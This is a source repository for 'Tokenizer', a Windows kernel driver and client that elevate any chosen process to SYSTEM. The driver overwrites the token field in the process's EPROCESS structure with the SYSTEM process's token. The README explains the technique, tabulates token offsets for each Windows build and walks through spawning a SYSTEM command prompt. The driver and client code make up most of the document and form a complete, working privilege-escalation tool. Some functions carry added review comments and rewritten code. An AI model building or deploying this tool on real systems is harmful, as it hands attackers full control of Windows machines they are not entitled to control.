├── Tokenizer
├── Tokenizer.vcxproj.filters
├── Tokenizer.inf
├── Tokenizer.vcxproj
└── driver.c
├── Tokenizer.sln
├── usermode_app
└── source.cpp
├── .gitattributes
├── README.md
└── .gitignore
/Tokenizer/Tokenizer.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {8E41214B-6785-4CFE-B992-037D68949A14}
18 | inf;inv;inx;mof;mc;
19 |
20 |
21 |
22 |
23 | Driver Files
24 |
25 |
26 |
27 |
28 | Source Files
29 |
30 |
31 |
--------------------------------------------------------------------------------
/Tokenizer.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.5.33424.131
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Tokenizer", "Tokenizer\Tokenizer.vcxproj", "{B107A7D0-7144-4431-93C6-59CCFE2B2168}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|ARM64 = Debug|ARM64
11 | Debug|x64 = Debug|x64
12 | Release|ARM64 = Release|ARM64
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|ARM64.ActiveCfg = Debug|ARM64
17 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|ARM64.Build.0 = Debug|ARM64
18 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|ARM64.Deploy.0 = Debug|ARM64
19 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|x64.ActiveCfg = Debug|x64
20 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|x64.Build.0 = Debug|x64
21 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Debug|x64.Deploy.0 = Debug|x64
22 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|ARM64.ActiveCfg = Release|ARM64
23 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|ARM64.Build.0 = Release|ARM64
24 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|ARM64.Deploy.0 = Release|ARM64
25 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|x64.ActiveCfg = Release|x64
26 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|x64.Build.0 = Release|x64
27 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}.Release|x64.Deploy.0 = Release|x64
28 | EndGlobalSection
29 | GlobalSection(SolutionProperties) = preSolution
30 | HideSolutionNode = FALSE
31 | EndGlobalSection
32 | GlobalSection(ExtensibilityGlobals) = postSolution
33 | SolutionGuid = {C170612B-63F1-46D5-A738-BD78EC60BADC}
34 | EndGlobalSection
35 | EndGlobal
36 |
--------------------------------------------------------------------------------
/usermode_app/source.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
// IOCTL code sent to the Tokenizer driver: function 0x69, METHOD_BUFFERED, FILE_ANY_ACCESS.
// Tokenizer/driver.c defines the same macro and compares the incoming control code
// against it, so the two definitions have to stay identical.
// FILE_ANY_ACCESS means the control code itself requires no particular access right
// on the handle that issues it.
4 | #define ppid CTL_CODE(FILE_DEVICE_UNKNOWN,0x69,METHOD_BUFFERED ,FILE_ANY_ACCESS)
5 |
/*
 * Probe whether the process with the given ID can be opened for query access.
 *
 * Returns 0 when OpenProcess(PROCESS_QUERY_INFORMATION) yields a handle and
 * -1 when it does not. The result only reflects whether the open succeeded;
 * a failed open is reported the same way whatever its cause.
 */
int
isProcessRunning(
    int pid
)
{
    HANDLE probe = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);

    if (probe)
    {
        /* The handle was only needed as an existence check. */
        CloseHandle(probe);
        return (0);
    }
    return (-1);
}
18 |
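/*
 * Console front end for the Tokenizer driver.
 *
 * Asks for a mode (1 = act on this process, 2 = act on a PID typed by the
 * user), opens the \\.\tokenizer device and sends the chosen PID with the
 * `ppid` IOCTL. The driver answers with an int status in the output buffer;
 * 0 is treated as success and anything else as failure.
 *
 * Returns 0 on success and -1 on any failure. The device handle is closed on
 * every path once it has been opened.
 */
int
wmain(
    void
)
{
    int choice = 0;
    int pid = 0;

    printf("1 to spawn an elevated process\n2 to elevate a specific process:\nPlease enter your input : ");
    /* Check the conversion count so non-numeric input is rejected outright. */
    if (scanf_s("%d", &choice) != 1)
    {
        printf("Invalid Option !\n");
        return (-1);
    }

    if (choice == 1)
    {
        pid = (int)GetCurrentProcessId();
    }
    else if (choice == 2)
    {
        printf("Enter process ID (pid) :");
        if (scanf_s("%d", &pid) != 1)
        {
            printf("Invalid process ID (pid). Please make sure to provide a valid pid.\n");
            return (-1);
        }
    }
    else
    {
        printf("Invalid Option !\n");
        return (-1);
    }

    HANDLE hdevice = CreateFile(L"\\\\.\\tokenizer", GENERIC_WRITE, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hdevice == INVALID_HANDLE_VALUE)
    {
        printf("failed to open device\n");
        return (-1);
    }
    printf("driver device opened\n");

    /*
     * driverStatus receives the int the driver writes back; it starts at -1
     * so an untouched buffer is never mistaken for success. bytesReturned is
     * passed because the call is synchronous (no OVERLAPPED structure).
     */
    int driverStatus = -1;
    DWORD bytesReturned = 0;
    int exitCode = -1;

    if (!DeviceIoControl(hdevice, ppid, (LPVOID)&pid, sizeof(pid), &driverStatus, sizeof(driverStatus), &bytesReturned, nullptr))
    {
        printf("Failed to send the IOCTL %x.\n", ppid);
    }
    else
    {
        printf("IOCTL %x sent!\n", ppid);

        if (bytesReturned == sizeof(driverStatus) && driverStatus == 0)
        {
            printf("Process %d token replaced successfully with system token!\n", pid);
            if ((DWORD)pid == GetCurrentProcessId())
            {
                /* Child processes inherit this process's token. */
                system("start");
                printf("Privileged process spawned successfully\n");
            }
            exitCode = 0;
        }
        else if (!isProcessRunning(pid))
        {
            /* The PID could be opened, so the failure was on the driver side. */
            printf("Failed to replace token.\n");
        }
        else
        {
            printf("Invalid process ID (pid). Please make sure to provide a valid pid.\n");
        }
    }

    CloseHandle(hdevice);
    if (exitCode == 0)
    {
        system("pause");
    }
    return (exitCode);
}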
80 |
--------------------------------------------------------------------------------
/Tokenizer/Tokenizer.inf:
--------------------------------------------------------------------------------
1 | ;
2 | ; Tokenizer.inf
3 | ;
4 |
5 | [Version]
6 | Signature="$WINDOWS NT$"
7 | Class=System ; TODO: specify appropriate Class
8 | ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318} ; TODO: specify appropriate ClassGuid
9 | Provider=%ManufacturerName%
10 | CatalogFile=Tokenizer.cat
11 | DriverVer= ; TODO: set DriverVer in stampinf property pages
12 | PnpLockdown=1
13 |
14 | [DestinationDirs]
15 | DefaultDestDir = 12
16 | Tokenizer_Device_CoInstaller_CopyFiles = 11
17 |
18 | [SourceDisksNames]
19 | 1 = %DiskName%,,,""
20 |
21 | [SourceDisksFiles]
22 | Tokenizer.sys = 1,,
23 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll=1 ; make sure the number matches with SourceDisksNames
24 |
25 | ;*****************************************
26 | ; Install Section
27 | ;*****************************************
28 |
29 | [Manufacturer]
30 | %ManufacturerName%=Standard,NT$ARCH$
31 |
32 | [Standard.NT$ARCH$]
33 | %Tokenizer.DeviceDesc%=Tokenizer_Device, Root\Tokenizer ; TODO: edit hw-id
34 |
35 | [Tokenizer_Device.NT]
36 | CopyFiles=Drivers_Dir
37 |
38 | [Drivers_Dir]
39 | Tokenizer.sys
40 |
41 | ;-------------- Service installation
42 | [Tokenizer_Device.NT.Services]
43 | AddService = Tokenizer,%SPSVCINST_ASSOCSERVICE%, Tokenizer_Service_Inst
44 |
45 | ; -------------- Tokenizer driver install sections
46 | [Tokenizer_Service_Inst]
47 | DisplayName = %Tokenizer.SVCDESC%
48 | ServiceType = 1 ; SERVICE_KERNEL_DRIVER
49 | StartType = 3 ; SERVICE_DEMAND_START
50 | ErrorControl = 1 ; SERVICE_ERROR_NORMAL
51 | ServiceBinary = %12%\Tokenizer.sys
52 |
53 | ;
54 | ;--- Tokenizer_Device Coinstaller installation ------
55 | ;
56 |
57 | [Tokenizer_Device.NT.CoInstallers]
58 | AddReg=Tokenizer_Device_CoInstaller_AddReg
59 | CopyFiles=Tokenizer_Device_CoInstaller_CopyFiles
60 |
61 | [Tokenizer_Device_CoInstaller_AddReg]
62 | HKR,,CoInstallers32,0x00010000, "WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll,WdfCoInstaller"
63 |
64 | [Tokenizer_Device_CoInstaller_CopyFiles]
65 | WdfCoInstaller$KMDFCOINSTALLERVERSION$.dll
66 |
67 | [Tokenizer_Device.NT.Wdf]
68 | KmdfService = Tokenizer, Tokenizer_wdfsect
69 | [Tokenizer_wdfsect]
70 | KmdfLibraryVersion = $KMDFVERSION$
71 |
72 | [Strings]
73 | SPSVCINST_ASSOCSERVICE= 0x00000002
74 | ManufacturerName="" ;TODO: Replace with your manufacturer name
75 | DiskName = "Tokenizer Installation Disk"
76 | Tokenizer.DeviceDesc = "Tokenizer Device"
77 | Tokenizer.SVCDESC = "Tokenizer Service"
78 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Tokenizer
2 |
3 | * Tokenizer is a kernel-mode driver project that replaces a process token in `EPROCESS` with the system token, effectively elevating the privileges of the process. The driver is designed to be used with a user-mode application that sends a process ID to the driver through an `IOCTL`.
4 |
5 | # technical details
6 |
7 | * When a process is created, it inherits the token of the user who created it. The token is used by the system to determine what actions the process can perform. It contains information about the user's security identifier (SID), group memberships, and privileges.
8 |
9 | 
10 |
11 | * The Token member resides at offset `0x4b8` in the `_EPROCESS` structure, which is the data structure that represents a process object. The Token member is defined as an `_EX_FAST_REF` structure, which is a union type that can store either a pointer to a kernel object or a reference count, depending on the size of the pointer. The offset of the `_EX_FAST_REF` structure within `_EPROCESS` depends on the specific version of Windows being used, but it is typically located at an offset of `0x4b8` in recent versions of Windows.
12 |
13 | * Windows Build Number token Offsets for x64 and x86 Architectures
14 |
15 | | x64 offsets | x86 offsets |
16 | | --------------| ------------------ |
17 | | 0x0160 (late 5.2) | 0x0150 (3.10) |
18 | | 0x0168 (6.0) | 0x0108 (3.50 to 4.0) |
19 | | 0x0208 (6.1) | 0x012C (5.0) |
20 | | 0x0348 (6.2 to 6.3) | 0xC8 (5.1 to early 5.2) |
21 | | 0x0358 (10.0 to 1809) | 0xD8 (late 5.2) |
22 | | 0x0360 (1903) | 0xE0 (6.0) |
23 | | 0x04B8 | 0xF8 (6.1) |
24 | | | 0xEC (6.2 to 6.3) |
25 | | | 0xF4 (10.0 to 1607) |
26 | | | 0xFC (1703 to 1903) |
27 | | | 0x012C |
28 |
29 |
30 | 
31 |
32 | * The `_EX_FAST_REF` structure in Windows contains three members: `Object`, `RefCount`, and `Value`.
33 |
34 | 
35 |
36 | * To display the process token in `_EX_FAST_REF`, we pass the address of the `_EX_FAST_REF` structure that contains the token, which is typically located at an offset of `0x4b8` in the `_EPROCESS` structure.
37 |
38 | 
39 |
40 | # Usage
41 |
42 | * You can either spawn a privileged process or elevate an already existing process ID.
43 |
44 | 
45 |
46 | * For the sake of this explanation, we will focus on the second option and use CMD as an example
47 |
48 | 
49 |
50 | * inherited Token
51 |
52 | 
53 |
54 | * send the Process ID to the driver through an IOCTL
55 |
56 | 
57 |
58 |
59 | * After receiving the PID from the user-mode application, the driver uses it to obtain a pointer to the `_EPROCESS` structure for the target process. The driver then accesses the Token member of the `_EPROCESS` structure to obtain a pointer to the process token, which it replaces with the system token, effectively changing the security context of the process to that of the system. However, if the driver does not correctly locate the Token member within the `_EPROCESS` structure, or if the offset of the Token is other than `0x4b8`, the driver may crash the system or the target process. This problem will be fixed in a future update.
60 |
61 | 
62 |
63 | * cmd token after
64 |
65 | 
66 |
67 | * the process privileges, groups, rights
68 |
69 | 
70 |
71 | # DEMO
72 |
73 | https://user-images.githubusercontent.com/60795188/226200873-d0516968-b175-4ff4-8e85-02018c641679.mp4
74 |
75 |
76 |
--------------------------------------------------------------------------------
/Tokenizer/Tokenizer.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | x64
7 |
8 |
9 | Release
10 | x64
11 |
12 |
13 | Debug
14 | ARM64
15 |
16 |
17 | Release
18 | ARM64
19 |
20 |
21 |
22 | {B107A7D0-7144-4431-93C6-59CCFE2B2168}
23 | {1bc93793-694f-48fe-9372-81e2b05556fd}
24 | v4.5
25 | 12.0
26 | Debug
27 | x64
28 | Tokenizer
29 |
30 |
31 |
32 | Windows10
33 | true
34 | WindowsKernelModeDriver10.0
35 | Driver
36 | KMDF
37 | Universal
38 | false
39 |
40 |
41 | Windows10
42 | false
43 | WindowsKernelModeDriver10.0
44 | Driver
45 | KMDF
46 | Universal
47 |
48 |
49 | Windows10
50 | true
51 | WindowsKernelModeDriver10.0
52 | Driver
53 | KMDF
54 | Universal
55 |
56 |
57 | Windows10
58 | false
59 | WindowsKernelModeDriver10.0
60 | Driver
61 | KMDF
62 | Universal
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | DbgengKernelDebugger
74 |
75 |
76 | DbgengKernelDebugger
77 |
78 |
79 | DbgengKernelDebugger
80 |
81 |
82 | DbgengKernelDebugger
83 |
84 |
85 |
86 | sha256
87 |
88 |
89 | false
90 |
91 |
92 |
93 |
94 | sha256
95 |
96 |
97 |
98 |
99 | sha256
100 |
101 |
102 |
103 |
104 | sha256
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
--------------------------------------------------------------------------------
/Tokenizer/driver.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
// Function-pointer type and variable for PsGetNextProcess.
// NOTE(review): the pointer is never assigned or called anywhere in this listing.
4 | typedef PEPROCESS(*t_PsGetNextProcess)(PEPROCESS Process);
5 | t_PsGetNextProcess PsGetNextProcess;
6 | typedef PEPROCESS _PEPROCESS;
// Prototype only. NOTE(review): not called anywhere in this listing.
7 | NTKERNELAPI PVOID PsGetProcessSectionBaseAddress(__in PEPROCESS Process);
8 |
// IOCTL code accepted by processIoctlRequest; the user-mode client defines the same value.
// FILE_ANY_ACCESS: the control code itself requires no particular access right on the
// caller's handle, so who can reach it is decided only by who can open the device.
9 | #define ppid CTL_CODE(FILE_DEVICE_UNKNOWN,0x69,METHOD_BUFFERED ,FILE_ANY_ACCESS)
// Device object name, and the symbolic link the client opens as \\.\tokenizer.
10 | UNICODE_STRING DeviceName = RTL_CONSTANT_STRING(L"\\Device\\Tokenizer");
11 | UNICODE_STRING SymbName = RTL_CONSTANT_STRING(L"\\??\\Tokenizer");
12 |
// Prototype only. NOTE(review): not called anywhere in this listing.
13 | NTSTATUS NTAPI MmCopyVirtualMemory
14 | (
15 | PEPROCESS SourceProcess,
16 | PVOID SourceAddress,
17 | PEPROCESS TargetProcess,
18 | PVOID TargetAddress,
19 | SIZE_T BufferSize,
20 | KPROCESSOR_MODE PreviousMode,
21 | PSIZE_T ReturnSize
22 | );
// Used by ParseAndReplaceEProcessToken to print the target's image name in debug output.
23 | char* PsGetProcessImageFileName(PEPROCESS Process);
24 |
// Looks up the process identified by `pid` and the process with ID 4, references
// both primary tokens, then copies the pointer-sized value at byte offset 0x4b8
// of the PID-4 process object over the value at the same offset in the target
// process object.
//
// Parameters:
//   pid - process ID received from the IOCTL caller; used as given.
// Returns:
//   0 when the copy and the final dereferences ran, -1 when a lookup or token
//   reference failed or when an exception was raised inside the __try block.
//
// NOTE(review): 0x4b8 is a fixed constant. The project README states that the
// offset differs between Windows builds and that a wrong offset may crash the
// system, so this routine is only meaningful on the build it was written for.
// NOTE(review): the README describes the field as an _EX_FAST_REF with a
// RefCount member; the raw copy below carries the whole value across and takes
// no extra reference for the new holder - confirm the lifetime implications.
// NOTE(review): the visible result is a process whose token field holds the
// same value as the PID-4 process, which is what a monitoring tool comparing
// those fields would observe.
25 | int
26 | ParseAndReplaceEProcessToken(
27 | int pid
28 | )
29 | {
30 | PVOID process = NULL;
31 | PVOID sys = NULL;
// Both token pointers are uninitialized until the references are taken below.
32 | PACCESS_TOKEN TargetToken;
33 | PACCESS_TOKEN sysToken;
34 | __try
35 | {
36 |
// Takes a reference on the target process object; every exit after this
// point is expected to release it.
37 | NTSTATUS ret = PsLookupProcessByProcessId((HANDLE)pid, &process);
38 | if (ret != STATUS_SUCCESS)
39 | {
40 | if (ret == STATUS_INVALID_PARAMETER)
41 | {
42 | DbgPrint("the process ID was not found.");
43 | }
44 | if (ret == STATUS_INVALID_CID)
45 | {
46 | DbgPrint("the specified client ID is not valid.");
47 | }
48 | return (-1);
49 | }
// NOTE(review): the status of this second lookup is discarded, so the check
// that follows re-tests `ret` from the first call (already STATUS_SUCCESS at
// this point) and its body cannot run; `sys` is used below without having
// been verified.
50 | PsLookupProcessByProcessId((HANDLE)0x4, &sys); // system process
51 |
52 | if (ret != STATUS_SUCCESS)
53 | {
54 | if (ret == STATUS_INVALID_PARAMETER)
55 | {
56 | DbgPrint("system process ID was not found.");
57 | }
58 | if (ret == STATUS_INVALID_CID)
59 | {
60 | DbgPrint("the system ID is not valid.");
61 | }
62 | ObDereferenceObject(process);
63 | return (-1);
64 | }
65 | char* ImageName;
66 |
// ImageName is assigned inside the argument list and reused by the later prints.
67 | DbgPrint("target process image name : %s \n", ImageName = PsGetProcessImageFileName((PEPROCESS)process));
68 |
// The two token references are used only for the debug prints; the copy
// further down works on the raw field, not on these pointers.
69 | TargetToken = PsReferencePrimaryToken(process);
70 | if (!TargetToken)
71 | {
72 | ObDereferenceObject(sys);
73 | ObDereferenceObject(process);
74 | return (-1);
75 | }
// NOTE(review): %x is narrower than a pointer on the x64/ARM64 targets this
// solution builds for, so this and the following address prints are truncated.
76 | DbgPrint("%s token : %x\n", ImageName, TargetToken);
77 |
78 | sysToken = PsReferencePrimaryToken(sys);
79 | if (!sysToken)
80 | {
81 | ObDereferenceObject(sys);
82 | ObDereferenceObject(TargetToken);
83 | ObDereferenceObject(process);
84 | return (-1);
85 | }
86 | DbgPrint("system token : %x\n", sysToken);
87 |
// Despite the variable name, 0x4b8 is the offset the README gives for the
// Token member, not for the process ID.
88 | ULONG_PTR UniqueProcessIdAddress = (ULONG_PTR)process + 0x4b8;
89 |
90 | DbgPrint("%s token address %x\n", ImageName, UniqueProcessIdAddress);
91 |
// Read but never used afterwards.
92 | unsigned long long UniqueProcessId = *(PHANDLE)UniqueProcessIdAddress;
93 |
94 |
95 | ULONG_PTR sysadd = (ULONG_PTR)sys + 0x4b8;
96 |
97 | DbgPrint("system token address : %x\n", sysadd);
98 |
// Read but never used afterwards.
99 | unsigned long long usysid = *(PHANDLE)sysadd;
100 |
// The write itself: one pointer-sized store into the target process object.
101 | *(PHANDLE)UniqueProcessIdAddress = *(PHANDLE)sysadd;
102 |
103 | DbgPrint("process %s Token updated to :%x ", ImageName, *(PHANDLE)(UniqueProcessIdAddress));
104 |
// Debug dump of the field at byte offsets 1..7. Each iteration performs a
// pointer-sized read at an unaligned address and keeps only the low byte, so
// the reads extend past the end of the field.
105 | for (int i = 1; i < 8; i++)
106 | {
107 | unsigned char f = *(PHANDLE)(UniqueProcessIdAddress + i);
108 | DbgPrint(" %x ", f);
109 | }
110 |
111 | DbgPrint("\n");
112 | }
// NOTE(review): this handler returns without releasing whichever of the
// process, sys, TargetToken and sysToken references had been taken before
// the exception.
113 | __except (EXCEPTION_EXECUTE_HANDLER)
114 | {
115 | return (-1);
116 | }
117 |
// Normal exit: release the four references taken above.
118 | ObDereferenceObject(sys);
119 | ObDereferenceObject(TargetToken);
120 | ObDereferenceObject(sysToken);
121 | ObDereferenceObject(process);
122 | return (0);
123 | }
124 |
/*
 * DriverUnload routine: removes the \??\Tokenizer symbolic link, deletes the
 * device object recorded on the driver object, and logs the unload.
 */
void
unloadv(
    PDRIVER_OBJECT driverObject
)
{
    PDEVICE_OBJECT device = driverObject->DeviceObject;

    /* Remove the user-visible name first, then the device behind it. */
    IoDeleteSymbolicLink(&SymbName);
    IoDeleteDevice(device);
    DbgPrint("Driver Unloaded\n");
}
134 |
135 |
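/*
 * IRP_MJ_DEVICE_CONTROL dispatch routine.
 *
 * Accepts only the `ppid` control code. The request carries an int process ID
 * in the buffered system buffer; the int result of
 * ParseAndReplaceEProcessToken is written back into the same buffer.
 *
 * Returns (and completes the IRP with):
 *   STATUS_SUCCESS                - request handled, sizeof(int) bytes returned
 *   STATUS_INVALID_DEVICE_REQUEST - control code is not `ppid`
 *   STATUS_INVALID_PARAMETER      - input buffer missing or shorter than an int
 *   STATUS_BUFFER_TOO_SMALL       - output buffer shorter than an int
 *
 * No caller check is made here: `ppid` is defined with FILE_ANY_ACCESS, so any
 * handle to the device can issue it.
 * NOTE(review): access control therefore rests entirely on the security
 * descriptor of the device object.
 */
NTSTATUS processIoctlRequest(
    DEVICE_OBJECT* DeviceObject,
    IRP* Irp
)
{
    PIO_STACK_LOCATION pstack = IoGetCurrentIrpStackLocation(Irp);
    NTSTATUS status = STATUS_SUCCESS;
    ULONG_PTR written = 0;

    UNREFERENCED_PARAMETER(DeviceObject);

    if (pstack->Parameters.DeviceIoControl.IoControlCode != ppid)
    {
        status = STATUS_INVALID_DEVICE_REQUEST;
    }
    else if (Irp->AssociatedIrp.SystemBuffer == NULL ||
             pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
    {
        /* The lengths are caller-supplied; never read past what was sent. */
        status = STATUS_INVALID_PARAMETER;
    }
    else if (pstack->Parameters.DeviceIoControl.OutputBufferLength < sizeof(int))
    {
        /*
         * IoStatus.Information tells the I/O manager how many bytes to copy
         * back, so it must not exceed the caller's output buffer.
         */
        status = STATUS_BUFFER_TOO_SMALL;
    }
    else
    {
        int inputInt = 0;
        int pstatus = 0;

        RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));

        pstatus = ParseAndReplaceEProcessToken(inputInt);

        DbgPrint("Received input value: %d\n", inputInt);

        RtlCopyMemory(Irp->AssociatedIrp.SystemBuffer, &pstatus, sizeof(pstatus));
        written = sizeof(pstatus);
    }

    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = written;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    /* The original fell off the end of this non-void function. */
    return status;
}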
158 |
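/*
 * IRP_MJ_CREATE dispatch routine: logs the open and completes the IRP with
 * STATUS_SUCCESS.
 *
 * The signature matches what the I/O manager passes to a MajorFunction entry
 * (device object, IRP) and the NTSTATUS it reads back.
 */
NTSTATUS IRP_MJCreate(
    PDEVICE_OBJECT DeviceObject,
    PIRP Irp
)
{
    UNREFERENCED_PARAMETER(DeviceObject);

    DbgPrint("IRP_CREATED\n");

    /* A dispatch routine has to complete (or pend) every IRP it is handed. */
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}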
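/*
 * IRP_MJ_CLOSE dispatch routine: logs the close and completes the IRP with
 * STATUS_SUCCESS.
 *
 * The signature matches what the I/O manager passes to a MajorFunction entry
 * (device object, IRP) and the NTSTATUS it reads back.
 */
NTSTATUS IRP_MJClose(
    PDEVICE_OBJECT DeviceObject,
    PIRP Irp
)
{
    UNREFERENCED_PARAMETER(DeviceObject);

    DbgPrint("IRP_Closed\n");

    /* A dispatch routine has to complete (or pend) every IRP it is handed. */
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}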
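/*
 * Driver entry point: registers the unload and dispatch routines, creates the
 * \Device\Tokenizer device object and the \??\Tokenizer symbolic link.
 *
 * Parameters:
 *   driverObject - driver object supplied by the I/O manager.
 *   registryPath - unused.
 * Returns:
 *   STATUS_SUCCESS, or the failure status of IoCreateDevice /
 *   IoCreateSymbolicLink. On failure nothing is left behind, because the
 *   unload routine is not run for a driver whose entry point fails.
 *
 * NOTE(review): the device is created with the default security descriptor,
 * and the only IOCTL is FILE_ANY_ACCESS, so whoever can open the device can
 * drive it. Creating it with IoCreateDeviceSecure and an administrators-only
 * SDDL string (e.g. SDDL_DEVOBJ_SYS_ALL_ADM_ALL) would narrow that; this needs
 * wdmsec.h and is left as a review item.
 */
NTSTATUS
DriverEntry(
    PDRIVER_OBJECT driverObject,
    PUNICODE_STRING registryPath
)
{
    PDEVICE_OBJECT device = NULL;
    NTSTATUS status;

    DbgPrint("Driver Loaded\n");
    UNREFERENCED_PARAMETER(registryPath);

    driverObject->DriverUnload = &unloadv;
    driverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = processIoctlRequest;
    driverObject->MajorFunction[IRP_MJ_CREATE] = IRP_MJCreate;
    driverObject->MajorFunction[IRP_MJ_CLOSE] = IRP_MJClose;

    /*
     * The fifth argument is DeviceCharacteristics, not a transfer method.
     * FILE_DEVICE_SECURE_OPEN makes the device's security descriptor apply to
     * every open in the device's namespace.
     */
    status = IoCreateDevice(driverObject, 0, &DeviceName, FILE_DEVICE_UNKNOWN,
                            FILE_DEVICE_SECURE_OPEN, FALSE, &device);
    if (!NT_SUCCESS(status))
    {
        DbgPrint("IoCreateDevice failed\n");
        return status;
    }

    status = IoCreateSymbolicLink(&SymbName, &DeviceName);
    if (!NT_SUCCESS(status))
    {
        DbgPrint("IoCreateSymbolicLink failed\n");
        /* Undo the device creation so a failed load leaves no device object. */
        IoDeleteDevice(device);
        return status;
    }

    return STATUS_SUCCESS;
}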
188 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
